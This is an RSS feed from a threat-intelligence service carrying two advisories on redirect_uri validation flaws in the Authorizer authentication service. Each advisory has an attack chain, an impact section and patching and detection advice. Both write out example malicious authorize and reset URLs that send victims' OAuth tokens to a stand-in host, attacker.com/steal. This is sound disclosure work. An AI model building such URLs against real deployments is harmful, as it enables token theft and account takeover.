<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Authorizer - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/vendors/authorizer/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Fri, 10 Jul 2026 19:27:19 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/vendors/authorizer/feed.xml" rel="self" type="application/rss+xml"/><item><title>Authorizer Unvalidated Redirect Vulnerability Allows OAuth2 Token Theft</title><link>https://feed.craftedsignal.io/briefs/2026-07-authorizer-unvalidated-redirect/</link><pubDate>Fri, 10 Jul 2026 19:27:19 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-07-authorizer-unvalidated-redirect/</guid><description>An unvalidated redirect vulnerability, CVE-2026-54072, in the Authorizer `/authorize` endpoint allows an unauthenticated attacker to steal OAuth2 access, ID, and refresh tokens by crafting a malicious URL with an attacker-controlled `redirect_uri` to which the application redirects a logged-in user, exposing their tokens.</description><content:encoded><![CDATA[<p>A critical unvalidated redirect vulnerability (CVE-2026-54072) in the Authorizer platform allows attackers to steal sensitive OAuth2 tokens. This flaw affects Authorizer versions prior to <code>0.0.0-20260409051328-bd3f5baf6d3d</code>. An unauthenticated attacker can exploit this by first querying the publicly accessible <code>/graphql</code> endpoint to retrieve a valid <code>client_id</code>. They then craft a malicious URL targeting the <code>/authorize</code> endpoint, embedding an arbitrary, attacker-controlled <code>redirect_uri</code>. If a logged-in victim clicks this link, the Authorizer application performs a 302 redirect to the attacker's specified URL, appending the victim's <code>access_token</code>, <code>id_token</code>, and <code>refresh_token</code> as query parameters. This enables the attacker to intercept these tokens and impersonate the victim for the tokens' entire lifetime, bypassing authentication mechanisms. A partial fix was applied in v2.0.1 for other handlers, but the <code>/authorize</code> endpoint was overlooked.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker queries the public <code>/graphql</code> endpoint (e.g., <code>http://TARGET/graphql</code>) to obtain the <code>client_id</code> parameter, which is required for authorization requests.</li>
<li>The attacker crafts a malicious URL, including the obtained <code>client_id</code> and a controlled <code>redirect_uri</code> (e.g., <code>https://attacker.com/steal</code>), pointing to the vulnerable Authorizer <code>/authorize</code> endpoint.</li>
<li>The malicious URL (e.g., <code>http://TARGET/authorize?response_type=token&amp;client_id=...&amp;redirect_uri=https://attacker.com/steal</code>) is delivered to a logged-in victim, typically via social engineering.</li>
<li>When the victim clicks the malicious link, their browser sends an HTTP GET request to the Authorizer <code>/authorize</code> endpoint.</li>
<li>The Authorizer server, lacking proper validation for the <code>redirect_uri</code> parameter against <code>AllowedOrigins</code>, processes the request.</li>
<li>The server issues a 302 HTTP redirect response, appending the victim's <code>access_token</code>, <code>id_token</code>, and <code>refresh_token</code> as query parameters to the attacker-controlled <code>redirect_uri</code>.</li>
<li>The victim's browser automatically follows the redirect, sending the sensitive tokens to the attacker's server.</li>
<li>The attacker receives and logs the tokens, gaining unauthorized access to the victim's account and the ability to impersonate them.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-54072 results in the complete compromise of a victim's OAuth2 tokens, including <code>access_token</code>, <code>id_token</code>, and <code>refresh_token</code>. An attacker can then use these stolen tokens to impersonate the victim and access resources or perform actions on their behalf for the full duration of the token's validity, without any further user interaction beyond the initial click. While the specific number of victims or targeted sectors is not disclosed, any organization using affected versions of Authorizer is at risk of account takeover and unauthorized data access.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Patch CVE-2026-54072 immediately by updating Authorizer to a patched version (newer than <code>0.0.0-20260409051328-bd3f5baf6d3d</code>).</li>
<li>Deploy the Sigma rule &quot;Detects CVE-2026-54072 Exploitation - Malicious redirect_uri in Authorizer /authorize Endpoint&quot; to your SIEM to detect attempts at exploiting this vulnerability.</li>
<li>Block <code>attacker.com</code> at your network perimeter, including DNS resolvers and web proxies.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>oauth</category><category>vulnerability</category><category>redirect</category><category>token-theft</category><category>web</category><category>ghsa</category></item><item><title>Authorizer Unvalidated Redirect URI Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2024-01-09-authorizer-redirect-uri/</link><pubDate>Tue, 09 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-09-authorizer-redirect-uri/</guid><description>Authorizer is vulnerable to unvalidated redirect URI injection in multiple endpoints, allowing attackers to steal password reset tokens, magic link tokens, and full authentication tokens by redirecting users to attacker-controlled sites.</description><content:encoded><![CDATA[<p>Authorizer, a Go-based authentication and authorization service, is susceptible to a critical vulnerability affecting versions prior to commit 73679fa. This vulnerability allows attackers to inject arbitrary redirect URIs into several endpoints, including ForgotPassword, MagicLinkLogin, Signup, InviteMembers, OAuthLoginHandler, and VerifyEmailHandler. The root cause is the lack of proper validation of the <code>redirect_uri</code> parameter against the configured <code>AllowedOrigins</code> in these endpoints. By exploiting this flaw, attackers can redirect users to malicious sites and steal sensitive information such as password reset tokens, magic link tokens, and full authentication tokens (access_token, id_token, refresh_token). This poses a significant threat as it bypasses intended security configurations and can lead to account takeover and unauthorized access.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker crafts a malicious URL containing a vulnerable Authorizer endpoint (e.g., ForgotPassword) and injects an attacker-controlled <code>redirect_uri</code> pointing to a malicious site (e.g., <code>https://attacker.com/steal</code>).</li>
<li>The victim initiates a password reset request, signup, magic link login, or other vulnerable action on the legitimate Authorizer instance.</li>
<li>Authorizer generates a password reset token, magic link token, or full auth tokens and appends it to the attacker-controlled <code>redirect_uri</code> without validation.</li>
<li>The victim receives a legitimate email or link from Authorizer containing the malicious URL.</li>
<li>The victim clicks the link, redirecting their browser to the attacker-controlled site.</li>
<li>The attacker-controlled site receives the sensitive token or full auth tokens as URL parameters (e.g., <code>https://attacker.com/steal?token=&lt;reset_token&gt;</code> or <code>https://attacker.com/steal?access_token=&lt;access_token&gt;&amp;id_token=&lt;id_token&gt;&amp;refresh_token=&lt;refresh_token&gt;</code>).</li>
<li>The attacker harvests the token(s) from the URL.</li>
<li>The attacker uses the stolen token(s) to reset the victim's password, gain unauthorized access to their account, or impersonate the victim.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This vulnerability can lead to complete account takeover due to stolen password reset tokens and full session compromise via stolen access tokens, ID tokens, and refresh tokens. It also affects passwordless login mechanisms by compromising magic link tokens. The attacker requires no prior authentication and only needs to trick the victim into clicking a link. This vulnerability affects any Authorizer instance running a vulnerable version, potentially impacting all users of applications relying on the vulnerable Authorizer service. The exposure of tokens in URL parameters also leads to information leakage through browser history, server logs, and referrer headers.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Authorizer to a version containing the fix for this vulnerability (&gt;= commit after 73679fa).</li>
<li>Implement robust validation of the <code>redirect_uri</code> parameter in all affected endpoints, specifically ForgotPassword, MagicLinkLogin, Signup, InviteMembers, OAuthLoginHandler, and VerifyEmailHandler, using a function similar to <code>validators.IsValidOrigin()</code> as used in <code>/app</code> handler.</li>
<li>Modify the default <code>AllowedOrigins</code> in <code>cmd/root.go</code> to a more restrictive value than <code>[&quot;*&quot;]</code> to force explicit configuration and prevent the OAuth endpoint's validation from becoming a no-op.</li>
<li>Deploy the Sigma rule <code>Detect Suspicious Redirect URI Parameters</code> to identify potential exploitation attempts in web server logs.</li>
<li>Monitor web server logs for requests to the affected Authorizer endpoints containing suspicious <code>redirect_uri</code> parameters, using the IOC <code>https://attacker.com/steal</code> as a starting point for identifying attacker infrastructure.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>redirect-uri</category><category>account-takeover</category><category>authorization</category></item></channel></rss>